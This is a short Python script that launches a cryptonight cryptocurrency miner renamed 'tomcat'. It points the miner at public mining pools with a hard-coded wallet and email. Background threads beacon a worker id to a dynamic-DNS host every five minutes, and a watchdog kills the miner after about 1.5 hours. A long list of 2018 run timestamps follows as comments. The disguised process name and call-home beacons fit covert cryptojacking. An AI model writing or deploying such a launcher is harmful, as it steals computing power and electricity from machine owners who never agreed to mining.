import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:03.565489
#2018-02-17 17:32:04.597678
#2018-02-17 19:20:06.203009
#2018-02-17 21:10:04.533263
#2018-02-17 22:54:04.357655
#2018-02-18 00:39:06.943323
#2018-02-18 02:29:03.318023
#2018-02-18 04:17:05.311857
#2018-02-18 06:07:06.708005
#2018-02-18 07:56:05.691736
#2018-02-18 09:44:05.570156
#2018-02-18 11:31:03.738868
#2018-02-18 13:16:06.387388
#2018-02-18 15:04:07.524449
#2018-02-18 16:52:06.613420
#2018-02-18 18:41:05.551811
#2018-02-18 20:28:01.734197
#2018-02-18 22:14:01.731802
#2018-02-19 00:03:05.271165
#2018-02-19 01:48:03.532260
#2018-02-19 03:35:06.941258
#2018-02-19 05:19:07.631791
#2018-02-19 07:06:01.619410
#2018-02-19 08:54:06.383821
#2018-02-19 10:43:09.851537
#2018-02-19 12:31:09.829899
#2018-02-19 14:18:01.608601
#2018-02-19 16:07:07.636951
#2018-02-19 17:54:04.281166
#2018-02-19 19:42:07.705411
#2018-02-19 21:30:07.718080
#2018-02-19 23:16:02.004019
#2018-02-20 01:02:01.319998
#2018-02-20 02:52:07.078424
#2018-02-20 04:41:05.361281
#2018-02-20 06:25:06.924437
#2018-02-20 08:10:09.201340
#2018-02-20 09:57:07.184753
#2018-02-20 11:41:08.576574
#2018-02-20 13:28:11.195798
#2018-02-20 15:14:04.550508
#2018-02-20 17:01:08.627465
#2018-02-20 18:49:11.322386
#2018-02-20 20:34:09.107628
#2018-02-20 22:18:04.038879
#2018-02-20 23:59:03.482609
#2018-02-21 01:45:05.892523
#2018-02-21 03:34:07.561489
#2018-02-21 05:23:01.862542
#2018-02-21 07:10:07.509756
#2018-02-21 08:55:07.375347
#2018-02-21 10:43:08.890996
#2018-02-21 12:32:04.384337
#2018-02-21 14:20:08.066496
#2018-02-21 16:08:01.376729
#2018-02-21 18:00:13.132442
#2018-02-21 19:46:08.556810
#2018-02-21 21:33:01.414699
#2018-02-21 23:21:01.442968
#2018-02-22 01:09:06.552188
#2018-02-22 02:58:08.589104
#2018-02-22 04:46:06.346540
#2018-02-22 06:32:07.845091
#2018-02-22 08:19:04.790142
#2018-02-22 10:08:01.603233
#2018-02-22 11:54:09.304693
#2018-02-22 13:39:05.252197
#2018-02-22 15:28:04.702063
#2018-02-22 17:14:05.199846
#2018-02-22 19:01:06.995895
#2018-02-22 20:52:02.067827
#2018-02-22 22:37:07.551843
#2018-02-23 00:24:06.131141
#2018-02-23 02:12:07.202087
#2018-02-23 04:02:04.760283
#2018-02-23 05:47:02.088929
#2018-02-23 07:39:01.464645
#2018-02-23 09:42:04.741219
#2018-02-23 11:46:06.588692
#2018-02-23 13:36:03.978489
#2018-02-23 15:23:07.717715
#2018-02-23 17:12:08.652845
#2018-02-23 18:57:06.889436
#2018-02-23 20:43:08.515995
#2018-02-23 22:28:05.478221
#2018-02-24 00:14:07.601144
#2018-02-24 02:07:05.602940
#2018-02-24 03:57:07.700158
#2018-02-24 05:43:06.514721
#2018-02-24 07:36:03.891915
#2018-02-24 09:21:04.759991
#2018-02-24 11:14:04.959836
#2018-02-24 13:03:07.527976
#2018-02-24 14:51:07.103088
#2018-02-24 16:43:04.696392
#2018-02-24 18:31:04.096959
#2018-02-24 20:18:04.926173
#2018-02-24 22:12:04.711420
#2018-02-25 01:09:06.214974
#2018-02-25 04:44:04.215970
#2018-02-25 08:48:01.340657